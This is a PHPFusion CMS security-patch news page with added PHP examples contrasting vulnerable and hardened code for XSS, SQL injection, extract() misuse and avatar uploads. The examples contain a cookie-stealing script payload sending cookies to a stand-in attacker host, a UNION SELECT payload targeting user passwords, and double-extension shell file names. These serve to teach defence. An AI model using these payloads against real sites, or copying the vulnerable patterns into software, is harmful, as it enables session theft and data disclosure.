PHPFusion v6.01.14
I'm pleased to announce the availability of PHPFusion v6.01.14. An XSS vulnerability patch is available for v6.01.13 - procedure as usual. Simply download the update package, overwrite the affected files and click the upgrade button under System Admin. If you are running an earlier version of 6.01.xx, you need to apply the previous updates before utilising this patch. The full SourceForge package and the SVN have been updated as well: PHPFusion 6.01.14 Update - for v6.01.13 only (1.58 KB). PHPFusion 6.01.14 (2.04 MB). Updated 19/04/2008: A minor error has been fixed - please refer to the comments for details.
April 16 2008
Low level XSS Fix (v6.01.11)
Updated 15 July 2007: The update mentioned below caused the lost password function to fail. This has now been corrected; the fixed lostpassword.php can be found in the 6.01.11 upgrade package. Original news: A Secunia advisory has brought to my attention an XSS in the FUSION_QUERY string. In order to fix this I have opted to use some v7 code. All users are strongly encouraged to keep their setups as up-to-date as possible, stop slacking! (Joke). Existing v6.01.10 users can download the file '6.01.11 Update for v6.01.10' and simply upload the included files and click upgrade under System Admin. The full SourceForge package has also been updated. Manual updaters can find the fix details in the CVS. PHPFusion 6.01.11 Update FOR V6.01.10 ONLY (6Kb). PHPFusion 6.01.11 (2.04Mb).
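The FUSION_QUERY problem in this item is a reflected XSS: the raw query string is echoed back into the page, typically in links that point at the current page. The PHP below is an added example, not PHPFusion's code and not the v7 fix the item refers to; it assumes the string comes from $_SERVER['QUERY_STRING'], and the function names and the payload are constructed for illustration.

```php
<?php
// Added example, not PHPFusion code: reflecting the raw query string into HTML
// versus encoding it for the attribute context first. Function names are assumed.

// Constructed stand-in for $_SERVER['QUERY_STRING'] on a request such as
//   news.php?readmore=5&"><script>document.location='http://attacker/?c='+document.cookie</script>
// i.e. a cookie-stealing payload of the kind the "Another XSS exploit fix" item mentions.
$query_string = 'readmore=5&"><script>document.location=\'http://attacker/?c=\'+document.cookie</script>';

// Vulnerable pattern: the query string is reused verbatim when a page links back to itself.
// The double quote in the payload closes the href attribute and <script> becomes live markup.
function self_link_unescaped(string $self, string $query): string
{
    return '<a href="' . $self . '?' . $query . '">next</a>';
}

// Hardened pattern: encode for the HTML attribute context at the point of output.
// ENT_QUOTES converts both ' and ", so neither can close the attribute; & and < are encoded too.
function self_link_escaped(string $self, string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $self . '?' . $safe . '">next</a>';
}

// Used here only to show the difference: does a script tag survive as markup?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$unsafe = self_link_unescaped('news.php', $query_string);
$safe   = self_link_escaped('news.php', $query_string);

echo "unescaped: $unsafe\n";
echo "escaped:   $safe\n";
echo 'script tag present: unescaped=', var_export(contains_script_tag($unsafe), true),
     ' escaped=', var_export(contains_script_tag($safe), true), "\n";
```

Encoding at the point of output is the fix; stripping "<script" from input is not, because the same string may be echoed into attributes, URLs and text nodes that each need a different encoding. The browser decodes the &amp; in the escaped href back to & when following the link, so legitimate multi-parameter query strings keep working.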
July 06 2007
Updated: Upgrade (v6.01.10)
It seems some people have been having trouble with image uploading since the update to v6.01.10. I have been working to resolve this issue and have discovered that the use of the html_entity_decode() function has been causing images to fail, thus not uploading. This issue has now been addressed and if you are having problems simply re-apply the patch below. Original news item: Just when you thought Friday the 13th could pass without any problems, a new exploit has been reported by CodeRS. A slight flaw has been discovered in the verify_image() function used to ensure that images do not contain malicious code. But, don't panic, because I am pleased to report that this problem has been addressed and a patch is now available for download (v6.01.10). All users are advised to upgrade immediately. We remain fully committed to the security of our CMS and will continue to fix problems should they arise as quickly as possible. Existing v6.01.9 users can download the file '6.01.10 Update for v6.01.9' and simply upload the included files and click upgrade under System Admin. If you are running an earlier version of 6.01.x you will first need to apply the previous updates. The full SourceForge package has been updated. PHPFusion 6.01.10 Update FOR V6.01.9 ONLY (10Kb). PHPFusion 6.01.10 (2.04Mb).
April 13 2007
Hacker alert
It has come to our attention that hackers are currently targeting PHPFusion sites that are using a few infusions which are open to UNION-based SQL injection exploits. These include arcade (starglowone.com) and toplist (rll.dk). If you are using either of these infusions, we strongly recommend that you get the latest versions from the above-mentioned websites. Alternatively you should disable these infusions. Please note: infusions provided by third parties are not guaranteed by the development team. Unfortunately, we do not have the time it takes to test every infusion that becomes available for PHPFusion. We cannot be held responsible for the actions of these mindless hackers. This site deals only with core issues, so discussions regarding issues with mods or infusions should be placed on the official mod site. Thanks.
April 05 2007
Low level XSS fixes (6.01.7)
In the last 48 hours a few XSS exploits have been reported. There are three files affected: edit_profile.php, print.php and forum/postify.php. For details of the exact updates please refer to the CVS. Thanks go to K_ros for his co-operation and information. Existing v6.01.6 users can download the file '6.01.7 Update for v6.01.6' and simply upload the included files and click upgrade under System Admin. The full SourceForge package has been updated. PHPFusion 6.01.7 Update FOR V6.01.6 ONLY (6Kb). PHPFusion 6.01.7 (2.04Mb).
February 22 2007
PHPFusion v6.01.5 Critical Release
In recent days it has been brought to my attention that there may be a possible exploit in the extraction of certain superglobal arrays in maincore.php. It depends on three things: the PHP version your host is using, register_globals being set to off, and magic_quotes_gpc being set to off. It is strongly recommended that you update to ensure the security of your site. Just to clarify, it has been suggested on one site that there is an issue with the admin files panels.php, panel_editor.php and maintenance.php. There are absolutely no problems with these files. All admin files utilise the same security protocols and cannot be tampered with by anyone without admin access. Existing v6.01.4 users can download the file '6.01.5 Update for v6.01.4' and simply upload the included files and click upgrade under System Admin. The full SourceForge package has been updated. PHPFusion 6.01.5 Update FOR V6.01.4 ONLY (9Kb). PHPFusion 6.01.5 (2.04Mb). maincore.php update details
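The item above does not say how the superglobal extraction could be abused, only that it lives in maincore.php and depends on the PHP version, register_globals and magic_quotes_gpc. The general class is well known: importing $_GET/$_POST into the script's variable scope to emulate register_globals lets a request parameter overwrite a variable the script already trusts. The PHP below is an added example of that class and of two ways to close it; it is not PHPFusion's maincore.php, and the variable names and the constructed request are assumed.

```php
<?php
// Added example, not PHPFusion code: emulating register_globals by importing a
// request array into the symbol table, and two safer alternatives. Names are assumed.

// Constructed request standing in for $_GET: a user tries to promote themselves.
$get = ['page' => '2', 'user_level' => '103'];

// Vulnerable: extract() defaults to EXTR_OVERWRITE, so a request parameter replaces
// a variable the script already set from a trusted source (here, "the session").
function page_vulnerable(array $request): array
{
    $user_level = 101;     // trusted value, e.g. loaded from the session earlier in the script
    extract($request);     // ?user_level=103 now silently overwrites $user_level
    return ['page' => $page, 'user_level' => $user_level];
}

// Hardened: never import request data into the symbol table. Read each parameter
// explicitly, validate its type, and keep trusted state in variables the request cannot name.
function page_hardened(array $request): array
{
    $user_level = 101;
    $page = (isset($request['page']) && ctype_digit($request['page']))
        ? (int) $request['page']
        : 1;
    // $request['user_level'] is simply never consulted
    return ['page' => $page, 'user_level' => $user_level];
}

// If legacy code genuinely needs extract(), EXTR_PREFIX_ALL keeps imported values in
// their own namespace ($req_page, $req_user_level); EXTR_SKIP would at least refuse
// to overwrite variables that already exist.
function page_legacy(array $request): array
{
    $user_level = 101;
    extract($request, EXTR_PREFIX_ALL, 'req');
    $page = ctype_digit($req_page) ? (int) $req_page : 1;
    return ['page' => $page, 'user_level' => $user_level];
}

var_dump(page_vulnerable($get));
var_dump(page_hardened($get));
var_dump(page_legacy($get));
```

The magic_quotes_gpc condition in the item concerns the same imported values reaching SQL unescaped; the answer there is prepared statements rather than relying on magic quotes, which PHP removed altogether, along with register_globals, in 5.4.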
September 02 2006
Notice: PHP Fusion Server Maintenance
The Fusion Server will be going offline sometime within the next 24 to 48 hours while we migrate to a new server. The server we are currently on requires maintenance, and to ensure a smooth transition with no issues we are moving to a new server with a different administration system for the server itself. If at any time you cannot access the website, it's due to us working on the DNS or the server itself. If DNS fails, use 69.50.235.29 to access this website. We would appreciate your patience in this matter. Update: Account transfers are taking place. Fusion UK has been transferred and themes will be transferred tomorrow. Thanks, Sheldon - Netriox
August 22 2006
messages.php to be scrapped
It's now become quite obvious that the current messages.php has more holes than I can fix. Therefore I am scrapping the entire script, with a complete rewrite under way. For your site's protection I recommend that you remove messages.php from your server, as hacking groups are targeting this script's hole to hijack admin accounts. I am working as fast as possible and should have a newly coded messages.php script ready within 48 hours. The new messages.php will work in all v6 installations. I apologise for any inconvenience caused by this issue.
May 25 2006
messages.php exploit fix, again.
It's just cursed: messages.php has yet another security issue (I've lost count now). Well, not to worry, an Italian support member, lnx85, has produced a fix. I have updated the two SourceForge packages and added the fixed file to patch 307, so this file is for existing users only. I fully intend to replace this script once v6.00.4 is released. Please make sure you update ASAP. · Download messages.php · Download PHPFusion 6.00.307 Update for v6.00.305 (24Kb). · Download PHPFusion 6.00.307 Update for v6.00.306 (12Kb).
May 17 2006
Critical update - v6.00.307
A new exploit has been revealed by rgod. It allows PHP files to be uploaded as avatars by allowing multiple file extensions. I have addressed this issue and have released updates for v6.00.305 and v6.00.306. We have also received information relating to locale file inclusion, but this is more down to 3rd party code. Please Read More for details. Existing v6.00.305/6 users can download the file '6.00.307 update for v6.00.305/6'. If you are using an earlier 6.00.3 version, ensure you upgrade to v6.00.305 before applying this update. Simply upload the included files and click upgrade under System Admin. The SourceForge packages have also been updated as usual. Click Read More for manual update details. Download PHPFusion 6.00.307 Update for v6.00.305 (13Kb). Download PHPFusion 6.00.307 Update for v6.00.306 (3Kb).
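The avatar bug in this item is the classic multiple-extension upload: a check that looks for an allowed image extension somewhere in the file name accepts shell.php.gif or shell.gif.php, and a web server that maps .php to the PHP handler for any extension in the name (Apache's mod_mime with AddHandler, historically) will execute the result. The forum-attachment issue in the next item is described by the author as similar. The PHP below is an added example of a loose check beside a strict one; it is not PHPFusion's upload code, and the function names and the constructed file names are assumed.

```php
<?php
// Added example, not PHPFusion code: a file-name check defeated by multiple extensions,
// a strict whole-name check, and a server-chosen stored name. Names are assumed.

// Constructed file names: the first two and the last two are attacker attempts.
$names = ['shell.php.gif', 'shell.gif.php', 'me.PNG', 'me.jpg', 'me', '../x.gif', 'a.php%00.gif'];

// Vulnerable: "does an allowed extension appear anywhere in the name?"
// Both shell.php.gif and shell.gif.php pass, and path separators are never checked.
function avatar_ok_vulnerable(string $name): bool
{
    return (bool) preg_match('/\.(gif|jpe?g|png)/i', $name);
}

// Hardened: whole-name match, exactly one dot, a short ASCII base name, and the
// allowed extension must be the last (and only) one.
function avatar_ok_hardened(string $name): bool
{
    return (bool) preg_match('/^[a-z0-9_-]{1,64}\.(gif|jpe?g|png)$/i', $name);
}

// Belt and braces: ignore the client name for storage and build the path from the
// user id plus the validated, normalised extension. Content sniffing of the uploaded
// bytes (getimagesize(), as the verify_image() item above implies) is still advisable.
function stored_avatar_name(string $client_name, int $user_id): ?string
{
    if (!avatar_ok_hardened($client_name)) {
        return null;
    }
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if ($ext === 'jpeg') {
        $ext = 'jpg';
    }
    return sprintf('avatar_%d.%s', $user_id, $ext);
}

foreach ($names as $n) {
    printf("%-15s vulnerable=%-6s hardened=%-6s stored=%s\n",
        $n,
        avatar_ok_vulnerable($n) ? 'accept' : 'reject',
        avatar_ok_hardened($n) ? 'accept' : 'reject',
        stored_avatar_name($n, 42) ?? '-');
}
```

Storing uploads outside the web root, or in a directory where script execution is disabled, closes the gap even when a name check is later found wanting, and the web server's own handler mapping decides whether a stray .php in the middle of a name matters.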
May 08 2006
Final update v6.00.306
I was hoping to keep this fix silent until the release of v6.00.400, but it has come to my attention that some people have discovered it. The exploit affects forum attachments, similar to the avatar exploit fixed in v6.00.305, so I would prefer not to release the exact details. I have adapted the new attachment code for v6.00.306 and you can download it now. Existing v6.00.305 users can download the file '6.00.306 update for v6.00.305'. If you are using an earlier 6.00.3 version, ensure you upgrade to v6.00.305 before applying this update. Simply upload the included files and click upgrade under System Admin. The SourceForge packages have also been updated as usual. If you wish to update manually please refer to the forum thread Manual update for v6.00.306. Update: There was a minor error in the downloads which prevents attachments from working. This has now been corrected; simply re-upload the files contained in the update zip. Sorry about that. Download PHPFusion 6.00.306 Update for v6.00.305 (13Kb).
April 19 2006
New hole in messages.php.
With more holes than a domestic sieve, messages.php has had yet another XSS exploit discovered and fixed. This script has caused countless problems (I didn't write it, CrappoMan did) and it may be time for us to scrap it and start afresh. Anyway, for now I have added a fix which you can get from the CVS. Normally we'd release a patch, but with v6.00.4 near completion there is little point. I have updated the two SourceForge packages, so this file is for existing users only. Download messages.php
April 16 2006
v6.00.205 - Multiple exploit fixes
Files updated: I've discovered two potential problems, in infusions -> shoutbox_panel -> shoutbox_archive.php and in the new news.php script. For some reason I neglected to sanitise the $rowstart variable; that's what you get for doing too much work! I've been notified about 3 exploits, 2 discovered by Yichen Xie and another reported by Secunia. Yichen Xie has discovered an exploit in lostpassword.php which allows a registered user to gain super admin access by manipulating the URL. Yichen has also found that users can delete all messages again by manipulating the URL. Finally, Secunia has informed us of an exploit in submitted news/articles due to improperly sanitised input. I'm pleased to say that I have addressed all of these issues and have released an immediate update. All v6.00.2 users are strongly advised to update ASAP. The SourceForge package has also been updated. Existing users can update your system by uploading the contents of the file 6-00-205up.zip to your server, then click Upgrade under System Admin. If you prefer to add the fixes manually please click Read More for instructions. Download v6.00.205 update (26Kb).
October 28 2005
Vulnerability in Private Messages
Following a Secunia advisory (PHPFusion "msg_send" SQL Injection Vulnerability) I have released an updated messages.php script for existing PHPFusion v6.00.1xx setups. Input passed to the "msg_send" parameter in "messages.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The SourceForge package has been updated to include the above fix. Download Messages Security Patch (10Kb). Update: The fix did not account for the $msg_send variable being blank, therefore preventing the use of the write new message button. This has now been rectified. Sorry for any inconvenience caused.
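The msg_send advisory above, the unsanitised $rowstart in the v6.00.205 item and the UNION attacks on third-party infusions in the "Hacker alert" item are the same bug: request values pasted into SQL text. The PHP below is an added example, not PHPFusion's messages.php or its patch; it assumes msg_send is the numeric id of the recipient being written to (a string straight from the URL), uses assumed table and column names with an assumed fusion_ prefix, and includes the blank-msg_send case that the follow-up fix had to allow.

```php
<?php
// Added example, not PHPFusion code: request values pasted into SQL text versus
// validated integers and bound parameters. Table and column names are assumed.

// Constructed attacker input: a UNION payload where an integer offset is expected,
// and a quote break where a numeric recipient id is expected.
$rowstart = '0 UNION SELECT user_name, user_password FROM fusion_users';
$msg_send = "0' OR '1'='1";

// Vulnerable: both values are interpolated. magic_quotes_gpc, even when on, only
// backslashes quotes; the unquoted LIMIT clause needs none, so $rowstart is open either way.
function queries_vulnerable(string $rowstart, string $msg_send): array
{
    return [
        "SELECT user_id, user_name FROM fusion_users WHERE user_id='$msg_send'",
        "SELECT message_id, message_subject FROM fusion_messages "
            . "ORDER BY message_datestamp DESC LIMIT $rowstart,20",
    ];
}

// An integer parameter is digits or it is the default; nothing else reaches the query.
function int_param(?string $value, int $default = 0): int
{
    return ($value !== null && ctype_digit($value)) ? (int) $value : $default;
}

// Hardened: each entry is [sql with placeholders, bound values] ready for a prepared
// statement, or null when the input is refused. A blank msg_send is legitimate (the
// "write new message" button with no recipient preselected), so it is handled rather
// than rejected, which is the regression the follow-up fix had to address.
function queries_hardened(string $rowstart, string $msg_send): array
{
    if ($msg_send === '') {
        $recipient = ['SELECT user_id, user_name FROM fusion_users ORDER BY user_name', []];
    } elseif (ctype_digit($msg_send)) {
        $recipient = ['SELECT user_id, user_name FROM fusion_users WHERE user_id=?', [(int) $msg_send]];
    } else {
        $recipient = null;   // neither blank nor a numeric id: refuse to build a query
    }
    $listing = [
        'SELECT message_id, message_subject FROM fusion_messages ORDER BY message_datestamp DESC LIMIT ?,20',
        [int_param($rowstart)],
    ];
    return [$recipient, $listing];
}

function show(string $label, array $queries): void
{
    foreach ($queries as $q) {
        if ($q === null) {
            echo "$label: rejected\n";
        } elseif (is_string($q)) {
            echo "$label: $q\n";
        } else {
            echo "$label: {$q[0]}  params=" . json_encode($q[1]) . "\n";
        }
    }
}

show('vulnerable', queries_vulnerable($rowstart, $msg_send));
show('hardened  ', queries_hardened($rowstart, $msg_send));
show('hardened  ', queries_hardened('20', ''));   // normal paging plus the blank-recipient case
```

When the hardened pairs are handed to PDO, bind the LIMIT offset with PDO::PARAM_INT (or disable emulated prepares); a string-bound value is quoted and MySQL rejects LIMIT '20',20, which is a second way a correct-looking fix can break paging.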
September 30 2005
Another XSS exploit fix
Another XSS exploit has been discovered that allows a malicious user to steal your cookie. Thankfully it was rather easy to fix, thanks to the help of CrappoMan and me. The fix is available as a separate patch (6-00-108up.zip) and has been added to the SourceForge files. Patch 6-00-108 upgrades both version 6.00.106 and 6.00.107. If you wish to update manually please click Read More for details. Thanks to ratboy and pacifico for their information. This patch also contains some more corrections in messages.php following a security advisory from GNUCitizen. Download 6-00-108.zip (11Kb). Update: There was a small mistake in maincore.php and messages.php in the update package. It has been corrected; please re-download and re-apply the package or fix the problem manually as instructed in the comments of this news item.
August 30 2005